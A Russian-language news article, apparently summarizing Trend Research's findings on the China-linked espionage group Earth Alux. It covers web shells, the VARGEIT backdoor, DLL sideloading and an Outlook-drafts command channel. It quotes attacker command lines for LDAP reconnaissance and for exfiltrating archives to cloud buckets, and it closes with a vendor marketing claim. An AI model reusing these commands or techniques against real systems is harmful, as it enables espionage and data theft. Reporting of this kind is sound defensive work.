Ssylka

Как Earth Alux формирует кибершпионские операции в современном цифровом пространстве?

Группа Earth Alux, ассоциированная с Китаем, демонстрирует высокий уровень технических возможностей в области кибершпионажа. Непрерывный мониторинг Trend Research выявил первые случаи активности в регионе APAC во втором квартале 2023 года, а к середине 2024 года наблюдались новые инциденты в Латинской Америке, включая Бразилию.
Как Earth Alux формирует кибершпионские операции в современном цифровом пространстве?
Изображение носит иллюстративный характер

Атаки начинаются с эксплуатации уязвимых сервисов на публично доступных серверах. Злоумышленники внедряют веб-оболочки, такие как GODZILLA, что позволяет им установить контрольные точки в системах жертв и задать начальную фазу проникновения.

Основным инструментом для обеспечения постоянного доступа является задняя дверь VARGEIT. На первом этапе эксплуатация происходит через инъекцию shellcode с помощью отладочного скрипта, при этом утилита cdb.exe переименовывается в fontdrvhost.exe, что соответствует методике LOLBAS. На последующих этапах применяется DLL-сайдлоадинг с использованием компонентов RAILLOAD для загрузки полезного кода и RAILSETTER, обеспечивающего установку, корректировку путей файлов и timestomping.

В качестве альтернативы VARGEIT используется backdoor COBEACON, выполняющий функцию первой стадии инфицирования. Загрузка осуществляется с помощью MASQLOADER, который применяет DLL-сайдлоадинг зашифрованного полезного кода с использованием замены символов, а также Rust-базированной утилитой RSBINJECT, позволяющей запускать shellcode напрямую без дополнительных процедур дешифровки.

Управление заражёнными системами происходит через командно-управляющий канал, основанный на Graph API для работы с данными Outlook. Сообщения, отправляемые из контролирующего сервера, имеют префикс «r_» и содержат уникальный идентификатор, сгенерированный по алгоритму fnv-1a x64 на основе случайного GUID, а шифруются с помощью AES-128 CBC, сжимаются zlib и кодируются в base64. Передача данных осуществляется через Outlook-черновики, что позволяет удалять сообщения после обработки и скрывать следы операций.

Для реализации инъекций кода VARGEIT использует запуск экземпляра mspaint, посредством которого производится вызов функций RtlCreateUserThread, VirtualAllocEx и WriteProcessMemory. При выполнении командной строки утилита создаёт каналы для захвата вывода, а для интерактивных операций задействуется именованный канал, обеспечивая точное взаимодействие с заражённой системой.

Фазы разведки, сбора и эксфильтрации данных включают использование специализированных команд, например «exe sElf98RqkF ldap <IP> <AD Domain> <machine AD domain>», что порождает файловую структуру с данными о пользователях, DNS-записях и групповых политиках. Полученные данные архивируются в ZIP-файлы (например, _20241111062500.zip, сохранённые в c:\programdata\data) и отправляются с помощью команд наподобие «exe gWgGfsq1PcUUoo <region> <bucket name> <ID> <secret> <expire time> dm9TTlEwM0NXRkF3TXRkM3RVSHg3SGQ3TDl4YVNRNGY= <path of data for exfiltration>» на контролируемые злоумышленниками облачные ресурсы.

Регулярное тестирование инструментов и методов – неотъемлемая часть деятельности Earth Alux. С помощью RAILLOAD и RAILSETTER проводятся проверки на обнаружение, экспериментируется с новыми хостами для DLL-сайдлоадинга, а также используются инструменты ZeroEye, CloneExportTable и VirTest для анализа импортных и экспортных таблиц EXE-файлов и модификации кода с целью обхода систем обнаружения.

Приоритетными целевыми секторами остаются государственные учреждения, технологические компании, логистика, производство, телекоммуникации, ИТ-услуги и розничная торговля. В фокусе операций – страны Тихоокеанского региона: Таиланд, Филиппины, Малайзия и Тайвань, а также активность в Латинской Америке, где наблюдаются основные кибершпионские атаки. Усиленные меры безопасности, регулярное обновление программного обеспечения и постоянный мониторинг сетевого трафика являются критически важными для защиты от данных угроз. Использование аналитических решений, таких как Threat Insights и системы Trend Cybertron, позволяет снизить риск ransomware на 92% и сократить время обнаружения инцидентов на 99%.


Новое на сайте

18930Чем грозит активная эксплуатация критической уязвимости CVE-2026-0625 в устаревших... 18929Аномально горячее скопление галактик SPT2349-56 опровергает существующие модели... 18928Луна миллиарды лет поглощает атмосферу земли через невидимый магнитный шлюз 18927Масштабная кампания «Prompt Poaching»: как расширения Chrome похищают данные... 18926Как критическая уязвимость CVE-2025-65606 позволяет получить полный контроль над... 18925Как метод «скользящих временных блоков» позволяет планировать день без потери свободы... 18924Критическая уязвимость в цепочке поставок популярных ИИ-редакторов кода угрожает... 18923Темная материя идентификации: скрытая угроза цифровой безопасности и статистика 2024 года 18922Откуда в захоронениях элитных венгерских подростков-воинов взялись итальянские сокровища... 18921Подводное северное сияние: структура песчаных отмелей багамских островов на снимке с мкс 18920Умные очки FORM Smart Swim 2 с встроенным дисплеем радикально меняют тренировки пловцов 18919Эволюция киберугроз начала 2026 года: от злоупотребления доверием до критических... 18918Как изменится архитектура доверия и скорость реагирования в кибербезопасности 2025 года? 18917Зачем первый король Англии приказал создать эту уникальную золотую драгоценность? 18916Действительно ли у кенгуру три вагины, а Исландия избавится от комаров только к октябрю...